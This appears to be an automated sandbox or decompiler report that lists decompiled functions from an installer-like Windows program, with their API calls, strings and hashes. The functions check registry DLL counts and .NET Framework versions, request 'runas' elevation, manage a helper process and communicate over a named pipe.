                                                            						 *[fs:eax] = _t194;
                                                            						__eflags = _v21;
                                                            						if(_v21 != 0) {
                                                            							_v28 = _v28 - 1;
                                                            							__eflags = _v28;
                                                            							if(_v28 > 0) {
                                                            								_t103 = _v32 - 1;
                                                            								__eflags = _t103;
                                                            								if(_t103 == 0) {
                                                            									E0042302C( &_v8, _v28, 0);
                                                            									_t170 = _v8;
                                                            									__eflags = _t170;
                                                            									if(_t170 != 0) {
                                                            										_t172 = _t170 - 4;
                                                            										__eflags = _t172;
                                                            										_t170 =  *_t172;
                                                            									}
                                                            									_t110 = E0040B278(_v8);
                                                            									RegSetValueExW(_v20, E0040B278(_v12), 0, 1, _t110, _t170 + 1 + _t170 + 1);
                                                            								} else {
                                                            									__eflags = _t103 + 0xfffffffe - 2;
                                                            									if(_t103 + 0xfffffffe - 2 < 0) {
                                                            										RegSetValueExW(_v20, E0040B278(_v12), 0, _v32,  &_v28, 4);
                                                            									}
                                                            								}
                                                            							} else {
                                                            								_v13 = 1;
                                                            								RegDeleteValueW(_v20, E0040B278(_v12));
                                                            							}
                                                            							__eflags = 0;
                                                            							_pop(_t196);
                                                            							 *[fs:eax] = _t196;
                                                            							_push(E0060E781);
                                                            							return RegCloseKey(_v20);
                                                            						} else {
                                                            							E004099B8();
                                                            							goto L30;
                                                            						}
                                                            					} else {
                                                            						E004099B8();
                                                            						goto L30;
                                                            					}
                                                            				}
                                                            			}


                                                            APIs
                                                              • Part of subcall function 005C7A14: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30
                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000,0060E77A,?,?,00000003,00000000,00000000,0060E7BE), ref: 0060E5F9
                                                              • Part of subcall function 005C857C: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,005CBEAE,00000000,005CBEFF,?,005CC0E0), ref: 005C859B
                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000004,00000000,0060E6B8,?,?,00000000,00000000,?,00000000,?,00000000), ref: 0060E67A
                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000004,00000000,0060E6B8,?,?,00000000,00000000,?,00000000,?,00000000), ref: 0060E6A1
                                                            Strings
                                                            • RegOpenKeyEx, xrefs: 0060E573
                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0060E54E
                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0060E515
                                                            • , xrefs: 0060E56A
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: QueryValue$FormatMessageOpen
                                                            • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                            • API String ID: 2812809588-1577016196
                                                            • Opcode ID: c935babc025dfde1231f0ed7150034372abcde662798295f1ed62f2a300e3225
                                                            • Instruction ID: f3c5cbb3acae1969306396449b745ae43344fa58bfe099d55e14c7ecbf00227c
                                                            • Opcode Fuzzy Hash: c935babc025dfde1231f0ed7150034372abcde662798295f1ed62f2a300e3225
                                                            • Instruction Fuzzy Hash: C7919270E84219AFDB04DFA5D885BEFBBBAEB48304F14482AF500E72C1D7769945CB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 84%
                                                            			E0062709C(signed int __eax, void* __ebx, signed int __edx, void* __edi, void* __esi) {
                                                            				signed int _v5;
                                                            				char _v8;
                                                            				void* _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				char _v24;
                                                            				char _v28;
                                                            				char _v32;
                                                            				char _v36;
                                                            				char _v40;
                                                            				void* __ecx;
                                                            				void* _t79;
                                                            				signed int _t83;
                                                            				signed char _t125;
                                                            				intOrPtr _t127;
                                                            				intOrPtr _t156;
                                                            				signed int _t170;
                                                            				intOrPtr _t178;
                                                            				intOrPtr _t180;
                                                            				intOrPtr _t181;
                                                            
                                                            				_t180 = _t181;
                                                            				_t127 = 4;
                                                            				do {
                                                            					_push(0);
                                                            					_push(0);
                                                            					_t127 = _t127 - 1;
                                                            				} while (_t127 != 0);
                                                            				_t1 =  &_v8;
                                                            				_t128 =  *_t1;
                                                            				 *_t1 = _t127;
                                                            				_t178 =  *_t1;
                                                            				_v5 = __edx;
                                                            				_t125 = __eax;
                                                            				_push(_t180);
                                                            				_push(0x6272a5);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t181;
                                                            				if( *((intOrPtr*)(0x6d6380 + ((__eax & 0x000000ff) + (__eax & 0x000000ff)) * 8 + (_v5 & 0x000000ff) * 4)) != 0) {
                                                            					L18:
                                                            					E0040A5A8(_t178,  *((intOrPtr*)(0x6d6380 + ((_t125 & 0x000000ff) + (_t125 & 0x000000ff)) * 8 + (_v5 & 0x000000ff) * 4)));
                                                            					_pop(_t156);
                                                            					 *[fs:eax] = _t156;
                                                            					_push(E006272AC);
                                                            					return E0040A228( &_v32, 5);
                                                            				}
                                                            				E00626F48(__eax, _t128,  &_v16, _t180);
                                                            				if((_v5 & 0x000000ff) + 0xfe - 2 >= 0 || E005C7A14(_t125, L"SOFTWARE\\Microsoft\\.NETFramework\\Policy\\v4.0", 0x80000002,  &_v12, 1, 0) != 0) {
                                                            					_t79 = (_v5 & 0x000000ff) - 1;
                                                            					if(_t79 == 0 || _t79 == 2) {
                                                            						if(E005C7A14(_t125, L"SOFTWARE\\Microsoft\\.NETFramework\\Policy\\v2.0", 0x80000002,  &_v12, 1, 0) != 0) {
                                                            							goto L10;
                                                            						} else {
                                                            							_t174 = _t125 & 0x0000007f;
                                                            							E005C4EA4( *((intOrPtr*)(0x6d6374 + (_t125 & 0x0000007f) * 4)),  &_v24);
                                                            							E0040B4C8(0x6d6380 + (_t174 + _t174) * 8 + (_v5 & 0x000000ff) * 4, L"v2.0.50727", _v24);
                                                            							RegCloseKey(_v12);
                                                            							goto L14;
                                                            						}
                                                            					} else {
                                                            						L10:
                                                            						_t83 = _v5 & 0x000000ff;
                                                            						if(_t83 == 0 || _t83 == 3) {
                                                            							if(E005C7A14(_t125, L"SOFTWARE\\Microsoft\\.NETFramework\\Policy\\v1.1", 0x80000002,  &_v12, 1, 0) == 0) {
                                                            								_t172 = _t125 & 0x0000007f;
                                                            								E005C4EA4( *((intOrPtr*)(0x6d6374 + (_t125 & 0x0000007f) * 4)),  &_v28);
                                                            								E0040B4C8(0x6d6380 + (_t172 + _t172) * 8 + (_v5 & 0x000000ff) * 4, L"v1.1.4322", _v28);
                                                            								RegCloseKey(_v12);
                                                            							}
                                                            						}
                                                            						goto L14;
                                                            					}
                                                            				} else {
                                                            					_t176 = _t125 & 0x0000007f;
                                                            					E005C4EA4( *((intOrPtr*)(0x6d6374 + (_t125 & 0x0000007f) * 4)),  &_v20);
                                                            					E0040B4C8(0x6d6380 + (_t176 + _t176) * 8 + (_v5 & 0x000000ff) * 4, L"v4.0.30319", _v20);
                                                            					RegCloseKey(_v12);
                                                            					L14:
                                                            					_t170 = _v5 & 0x000000ff;
                                                            					if( *((intOrPtr*)(0x6d6380 + ((_t125 & 0x000000ff) + (_t125 & 0x000000ff)) * 8 + _t170 * 4)) == 0) {
                                                            						if(_v5 == 3) {
                                                            							E0060CD28(L".NET Framework not found", _t125);
                                                            						} else {
                                                            							_v40 =  *((intOrPtr*)(0x6cd0a4 + _t170 * 4));
                                                            							_v36 = 0x11;
                                                            							E004244F8(L".NET Framework version %s not found", 0,  &_v40,  &_v32);
                                                            							E0060CD28(_v32, _t125);
                                                            						}
                                                            					}
                                                            					goto L18;
                                                            				}
                                                            			}
























                                                            APIs
                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,006272A5,?,00626DA0,?,00000000,00000000,00000000,?,?,00627510,00000000), ref: 00627149
                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,006272A5,?,00626DA0,?,00000000,00000000,00000000,?,?,00627510,00000000), ref: 006271B3
                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,00000001,00000000,00000000,006272A5,?,00626DA0,?,00000000,00000000,00000000,?), ref: 0062721A
                                                            Strings
                                                            • v4.0.30319, xrefs: 0062713B
                                                            • v1.1.4322, xrefs: 0062720C
                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 006270FF
                                                            • .NET Framework version %s not found, xrefs: 00627252
                                                            • .NET Framework not found, xrefs: 00627266
                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00627169
                                                            • v2.0.50727, xrefs: 006271A5
                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 006271D0
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                            • API String ID: 3535843008-446240816
                                                            • Opcode ID: e0941211630b040962ad433e1c7d93649d8e46d21326bdffa5a487f6456e7331
                                                            • Instruction ID: 6a27bfdae97b75501bbdc0cce0dcd9b9ee0f65bcede85a7be403583e7914197f
                                                            • Opcode Fuzzy Hash: e0941211630b040962ad433e1c7d93649d8e46d21326bdffa5a487f6456e7331
                                                            • Instruction Fuzzy Hash: 8551E131A091699FCF04DBA8E861FFD7BB7EF45300F1504AAF500A7392D639AB058B21
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 79%
                                                            			E006A60E8(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __esi, void* __eflags, void* __fp0) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				DWORD* _v16;
                                                            				struct _SHELLEXECUTEINFOW _v76;
                                                            				long _t41;
                                                            				intOrPtr _t69;
                                                            				void* _t71;
                                                            				void* _t73;
                                                            				void* _t74;
                                                            				intOrPtr _t75;
                                                            
                                                            				_t73 = _t74;
                                                            				_t75 = _t74 + 0xffffffb8;
                                                            				_v8 = 0;
                                                            				_v12 = 0;
                                                            				_v16 = __ecx;
                                                            				_t71 = __edx;
                                                            				_t60 = __eax;
                                                            				_push(_t73);
                                                            				_push(0x6a6237);
                                                            				 *[fs:eax] = _t75;
                                                            				E006A5F04(__eax,  &_v8,  *[fs:eax]);
                                                            				E006A6014( &_v12, _t60, _t71);
                                                            				E00407760( &_v76, 0x3c);
                                                            				_v76.cbSize = 0x3c;
                                                            				_v76.fMask = 0x800540;
                                                            				_v76.lpVerb = L"runas";
                                                            				_v76.lpFile = E0040B278(_v8);
                                                            				_v76.lpParameters = E0040B278(_t71);
                                                            				_v76.lpDirectory = E0040B278(_v12);
                                                            				_v76.nShow = 1;
                                                            				if(ShellExecuteExW( &_v76) == 0) {
                                                            					if(GetLastError() == 0x4c7) {
                                                            						E00428FDC();
                                                            					}
                                                            					E0060CE84(L"ShellExecuteEx");
                                                            				}
                                                            				if(_v76.hProcess == 0) {
                                                            					E0060CD28(L"ShellExecuteEx returned hProcess=0", _t60);
                                                            				}
                                                            				_push(_t73);
                                                            				_push(0x6a6215);
                                                            				_push( *[fs:edx]);
                                                            				 *[fs:edx] = _t75;
                                                            				do {
                                                            					E006A5C10();
                                                            					_t41 = MsgWaitForMultipleObjects(1,  &(_v76.hProcess), 0, 0xffffffff, 0x4ff);
                                                            				} while (_t41 == 1);
                                                            				if(_t41 == 0xffffffff) {
                                                            					E0060CE84(L"MsgWaitForMultipleObjects");
                                                            				}
                                                            				E006A5C10();
                                                            				if(GetExitCodeProcess(_v76.hProcess, _v16) == 0) {
                                                            					E0060CE84(L"GetExitCodeProcess");
                                                            				}
                                                            				_pop(_t69);
                                                            				 *[fs:eax] = _t69;
                                                            				_push(E006A621C);
                                                            				return CloseHandle(_v76.hProcess);
                                                            			}














                                                            APIs
                                                              • Part of subcall function 006A5F04: GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F30
                                                              • Part of subcall function 006A5F04: GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F49
                                                              • Part of subcall function 006A5F04: CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F73
                                                              • Part of subcall function 006A5F04: CloseHandle.KERNEL32(00000000), ref: 006A5F91
                                                              • Part of subcall function 006A6014: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,006A60A5,?,00000097,00000000,?,006A611F,00000000,006A6237,?,?,00000001), ref: 006A6043
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 006A616F
                                                            • GetLastError.KERNEL32(0000003C,00000000,006A6237,?,?,00000001), ref: 006A6178
                                                            • MsgWaitForMultipleObjects.USER32 ref: 006A61C5
                                                            • GetExitCodeProcess.KERNEL32 ref: 006A61EB
                                                            • CloseHandle.KERNEL32(00000000,006A621C,00000000,00000000,000000FF,000004FF,00000000,006A6215,?,0000003C,00000000,006A6237,?,?,00000001), ref: 006A620F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Handle$CloseFile$AttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcessShellWait
                                                            • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00625D14(intOrPtr __eax, void* __edx) {
                                                            				long _v12;
                                                            				long _v16;
                                                            				void* __ebx;
                                                            				void* __esi;
                                                            				void* _t44;
                                                            				void* _t50;
                                                            				intOrPtr _t51;
                                                            				DWORD* _t52;
                                                            
                                                            				_t19 = __eax;
                                                            				_t52 =  &_v12;
                                                            				_t44 = __edx;
                                                            				_t51 = __eax;
                                                            				if( *((char*)(__eax + 4)) == 0) {
                                                            					L11:
                                                            					return _t19;
                                                            				}
                                                            				 *((char*)(__eax + 5)) = 1;
                                                            				_v16 =  *((intOrPtr*)(__eax + 0x10));
                                                            				_v12 = 0;
                                                            				E006163B4(L"Stopping 64-bit helper process. (PID: %u)", __edx, 0,  &_v16, _t50, __eax);
                                                            				CloseHandle( *(_t51 + 0xc));
                                                            				 *(_t51 + 0xc) = 0;
                                                            				while(WaitForSingleObject( *(_t51 + 8), 0x2710) == 0x102) {
                                                            					E00616130(L"Helper isn\'t responding; killing it.", _t44, _t50, _t51);
                                                            					TerminateProcess( *(_t51 + 8), 1);
                                                            				}
                                                            				if(GetExitCodeProcess( *(_t51 + 8), _t52) == 0) {
                                                            					E00616130(L"Helper process exited, but failed to get exit code.", _t44, _t50, _t51);
                                                            				} else {
                                                            					if( *_t52 != 0) {
                                                            						_v16 =  *_t52;
                                                            						_v12 = 0;
                                                            						E006163B4(L"Helper process exited with failure code: 0x%x", _t44, 0,  &_v16, _t50, _t51);
                                                            					} else {
                                                            						E00616130(L"Helper process exited.", _t44, _t50, _t51);
                                                            					}
                                                            				}
                                                            				CloseHandle( *(_t51 + 8));
                                                            				 *(_t51 + 8) = 0;
                                                            				_t19 = 0;
                                                            				 *((intOrPtr*)(_t51 + 0x10)) = 0;
                                                            				 *((char*)(_t51 + 4)) = 0;
                                                            				if(_t44 == 0) {
                                                            					goto L11;
                                                            				} else {
                                                            					Sleep(0xfa);
                                                            					return 0;
                                                            				}
                                                            			}












                                                            APIs
                                                            • CloseHandle.KERNEL32(?), ref: 00625D4B
                                                            • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00625D67
                                                            • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00625D75
                                                            • GetExitCodeProcess.KERNEL32 ref: 00625D86
                                                            • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625DCD
                                                            • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625DE9
                                                            Strings
                                                            • Helper process exited with failure code: 0x%x, xrefs: 00625DB3
                                                            • Helper isn't responding; killing it., xrefs: 00625D57
                                                            • Helper process exited, but failed to get exit code., xrefs: 00625DBF
                                                            • Stopping 64-bit helper process. (PID: %u), xrefs: 00625D3D
                                                            • Helper process exited., xrefs: 00625D95
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                            • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 67%
                                                            			E006B740C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                            				char _v8;
                                                            				struct HWND__* _v12;
                                                            				void* _v16;
                                                            				char _v20;
                                                            				char _v24;
                                                            				char _v28;
                                                            				struct HWND__* _v32;
                                                            				char _v36;
                                                            				char _v40;
                                                            				char _v44;
                                                            				char _v48;
                                                            				WCHAR* _t41;
                                                            				intOrPtr _t42;
                                                            				int _t44;
                                                            				intOrPtr* _t54;
                                                            				void* _t68;
                                                            				intOrPtr _t80;
                                                            				intOrPtr _t102;
                                                            				intOrPtr _t104;
                                                            				void* _t108;
                                                            				void* _t109;
                                                            				intOrPtr _t110;
                                                            				void* _t118;
                                                            
                                                            				_t118 = __fp0;
                                                            				_t106 = __esi;
                                                            				_t105 = __edi;
                                                            				_t88 = __ecx;
                                                            				_t87 = __ebx;
                                                            				_t108 = _t109;
                                                            				_t110 = _t109 + 0xffffffd4;
                                                            				_push(__ebx);
                                                            				_push(__esi);
                                                            				_push(__edi);
                                                            				_v24 = 0;
                                                            				_v48 = 0;
                                                            				_v44 = 0;
                                                            				_v20 = 0;
                                                            				_v8 = 0;
                                                            				_push(_t108);
                                                            				_push(0x6b75fa);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t110;
                                                            				E005C75E4( &_v20, __ebx, __ecx, __eflags);
                                                            				if(E0060D3B4(_v20, __ebx,  &_v8, __edi, __esi) == 0) {
                                                            					_push(_t108);
                                                            					_push( *[fs:eax]);
                                                            					 *[fs:eax] = _t110;
                                                            					E0060D8B0(0, _t87, _v8, __edi, __esi);
                                                            					_pop(_t104);
                                                            					_t88 = 0x6b746f;
                                                            					 *[fs:eax] = _t104;
                                                            				}
                                                            				_t41 = E0040B278(_v8);
                                                            				_t42 =  *0x6d68d0; // 0x0
                                                            				_t44 = CopyFileW(E0040B278(_t42), _t41, 0);
                                                            				_t113 = _t44;
                                                            				if(_t44 == 0) {
                                                            					_t80 =  *0x6cded8; // 0x6d5c28
                                                            					_t11 = _t80 + 0x208; // 0x0
                                                            					E006B68EC( *_t11, _t87, _t88, _t106, _t113);
                                                            				}
                                                            				SetFileAttributesW(E0040B278(_v8), 0x80);
                                                            				_v12 = E00414DA0(0, L"STATIC", 0,  *0x6d2634, 0, 0, 0, 0, 0, 0, 0);
                                                            				 *0x6d68fc = SetWindowLongW(_v12, 0xfffffffc, E006B6AB0);
                                                            				_push(_t108);
                                                            				_push(0x6b75c3);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t110;
                                                            				_t54 =  *0x6cdec4; // 0x6d579c
                                                            				SetWindowPos( *( *_t54 + 0x188), 0, 0, 0, 0, 0, 0x97);
                                                            				E005C6FB0(0, _t87,  &_v44, _t105, _t106);
                                                            				_v40 = _v44;
                                                            				_v36 = 0x11;
                                                            				_v32 = _v12;
                                                            				_v28 = 0;
                                                            				E004244F8(L"/SECONDPHASE=\"%s\" /FIRSTPHASEWND=$%x ", 1,  &_v40,  &_v24);
                                                            				_push( &_v24);
                                                            				E005C6E90( &_v48, _t87, _t106, 0);
                                                            				_pop(_t68);
                                                            				E0040B470(_t68, _v48);
                                                            				_v16 = E006B6998(_v8, _t87, _v24, _t105, _t106, _t118);
                                                            				do {
                                                            				} while (E006B6A74() == 0 && MsgWaitForMultipleObjects(1,  &_v16, 0, 0xffffffff, 0x4ff) == 1);
                                                            				CloseHandle(_v16);
                                                            				_pop(_t102);
                                                            				 *[fs:eax] = _t102;
                                                            				_push(E006B75CA);
                                                            				return DestroyWindow(_v12);
                                                            			}



























                                                            APIs
                                                              • Part of subcall function 0060D3B4: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4A1
                                                              • Part of subcall function 0060D3B4: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4B1
                                                            • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,006B75FA), ref: 006B748F
                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,006B75FA), ref: 006B74B6
                                                            • SetWindowLongW.USER32 ref: 006B74F0
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000,?,00000000), ref: 006B7525
                                                            • MsgWaitForMultipleObjects.USER32 ref: 006B7599
                                                            • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000), ref: 006B75A7
                                                              • Part of subcall function 0060D8B0: WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D996
                                                            • DestroyWindow.USER32(?,006B75CA,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000,?), ref: 006B75BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FileWindow$CloseHandle$AttributesCopyCreateDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                            • String ID: (\m$/SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                            • API String ID: 1779715363-1630723103
                                                            • Opcode ID: 590c0ad9364cb792a84a58c9118fcebc7ede51f51827efcc5232604c532853bb
                                                            • Instruction ID: ef81c38150d0c0f6437f901880bd06975f11695bff6d213fe2789ed19ae6d402
                                                            • Opcode Fuzzy Hash: 590c0ad9364cb792a84a58c9118fcebc7ede51f51827efcc5232604c532853bb
                                                            • Instruction Fuzzy Hash: EE4181B1A04208AFDB00EFB5DC56EDE7BF9EB89314F11456AF500F7291DB789A408B64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 55%
                                                            			E00625FC4(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __fp0, char _a4) {
                                                            				intOrPtr _v8;
                                                            				long _v12;
                                                            				void* _v16;
                                                            				struct _OVERLAPPED _v36;
                                                            				intOrPtr _v40;
                                                            				intOrPtr _v44;
                                                            				long _t83;
                                                            				intOrPtr _t94;
                                                            				void* _t99;
                                                            				void* _t100;
                                                            				intOrPtr _t101;
                                                            
                                                            				_t99 = _t100;
                                                            				_t101 = _t100 + 0xffffffd8;
                                                            				_v40 = 0;
                                                            				_v44 = 0;
                                                            				_v8 = __eax;
                                                            				_push(_t99);
                                                            				_push(0x626202);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t101;
                                                            				 *(_v8 + 0x14) =  *(_v8 + 0x14) + 1;
                                                            				 *(_v8 + 0x20) =  *(_v8 + 0x14);
                                                            				 *((intOrPtr*)(_v8 + 0x24)) = __edx;
                                                            				 *((intOrPtr*)(_v8 + 0x28)) = __ecx;
                                                            				_t83 = 0xc + __ecx;
                                                            				_push(_t99);
                                                            				_push(0x6261a7);
                                                            				_push( *[fs:edx]);
                                                            				 *[fs:edx] = _t101;
                                                            				_v16 = CreateEventW(0, 0xffffffff, 0, 0);
                                                            				if(_v16 == 0) {
                                                            					E0060CE84(L"CreateEvent");
                                                            				}
                                                            				_push(_t99);
                                                            				_push(0x62613c);
                                                            				_push( *[fs:edx]);
                                                            				 *[fs:edx] = _t101;
                                                            				E00407760( &_v36, 0x14);
                                                            				_v36.hEvent = _v16;
                                                            				if(TransactNamedPipe( *(_v8 + 0xc), _v8 + 0x20, _t83, _v8 + 0x4034, 0x14,  &_v12,  &_v36) != 0) {
                                                            					_pop(_t94);
                                                            					 *[fs:eax] = _t94;
                                                            					_push(E00626143);
                                                            					return CloseHandle(_v16);
                                                            				} else {
                                                            					if(GetLastError() != 0x3e5) {
                                                            						E0060CE84(L"TransactNamedPipe");
                                                            					}
                                                            					_push(_t99);
                                                            					_push(0x62610e);
                                                            					_push( *[fs:edx]);
                                                            					 *[fs:edx] = _t101;
                                                            					if(_a4 != 0 &&  *((short*)(_v8 + 0x1a)) != 0) {
                                                            						do {
                                                            							 *((intOrPtr*)(_v8 + 0x18))();
                                                            						} while (MsgWaitForMultipleObjects(1,  &_v16, 0, 0xffffffff, 0x4ff) == 1);
                                                            					}
                                                            					_pop( *[fs:0x0]);
                                                            					_push(E00626115);
                                                            					GetOverlappedResult( *(_v8 + 0xc),  &_v36,  &_v12, 0xffffffff);
                                                            					return GetLastError();
                                                            				}
                                                            			}















                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,000000FF,00000000,00000000,00000000,006261A7,?,00000000,00626202,?,?,00000000,00000000), ref: 00626021
                                                            • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,0062613C,?,00000000,000000FF,00000000,00000000,00000000,006261A7), ref: 0062607E
                                                            • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,0062613C,?,00000000,000000FF,00000000,00000000,00000000,006261A7), ref: 0062608B
                                                            • MsgWaitForMultipleObjects.USER32 ref: 006260D7
                                                            • GetOverlappedResult.KERNEL32(?,?,00000000,000000FF,00626115,00000000,00000000), ref: 00626101
                                                            • GetLastError.KERNEL32(?,?,00000000,000000FF,00626115,00000000,00000000), ref: 00626108
                                                              • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp
